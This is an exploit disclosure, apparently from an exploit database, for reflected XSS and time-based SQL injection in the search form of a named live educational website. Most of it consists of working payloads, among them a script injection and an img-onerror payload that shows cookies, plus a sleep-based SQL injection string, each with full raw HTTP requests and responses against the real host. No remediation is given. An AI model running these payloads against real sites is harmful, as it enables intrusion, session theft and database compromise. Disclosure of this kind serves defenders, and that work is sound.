# Exploit Title: ogretmenlerodasi Reflected XSS + SQL injection # Date: 13/01/2020 # Exploit Author: Furkan Özer # Vendor Homepage: http://ogretmenlerodasi.org.tr/ # CVE: - # CWE: 79 ----[]- Info: -[]---- http://ogretmenlerodasi.org.tr/arama.php ----[]- Reflected XSS: -[]---- Payload Sample #2 :aramakelime='"()&%1<ScRiPt >prompt(930653)</ScRiPt>&buton= Payload Sample #2: "><img src=x onerror=alert(document.cookie)> Request POST /arama.php HTTP/1.1 Content-Length: 86 Content-Type: application/x-www-form-urlencoded Host: ogretmenlerodasi.org.tr Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.872.0 Safari/535.2 Accept: */* aramakelime=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28930653%29%3c%2fScRiPt%3e&buton=Response HTTP/1.1 200 OK Server: nginx Date: Sun, 12 Jan 2020 15:34:47 GMT Content-Type: text/html Connection: keep-alive X-Powered-By: PHP/5.4.45 MS-Author-Via: DAV X-Powered-By: PleskLin Content-Length: 8766 SQL Li URL encoded POST input aramakelime was set to 1' or (sleep(2)+1) limit 1 -- POST /arama.php HTTP/1.1 Content-Length: 73 Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Host: ogretmenlerodasi.org.tr Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.872.0 Safari/535.2 Accept: */* aramakelime=1%27%20or%20%28sleep%282%29%2b1%29%20limit%201%20--%20&buton=Response HTTP/1.1 200 OK Server: nginx Date: Sun, 12 Jan 2020 15:35:00 GMT Content-Type: text/html Connection: keep-alive X-Powered-By: PHP/5.4.45 MS-Author-Via: DAV X-Powered-By: PleskLin Content-Length: 8898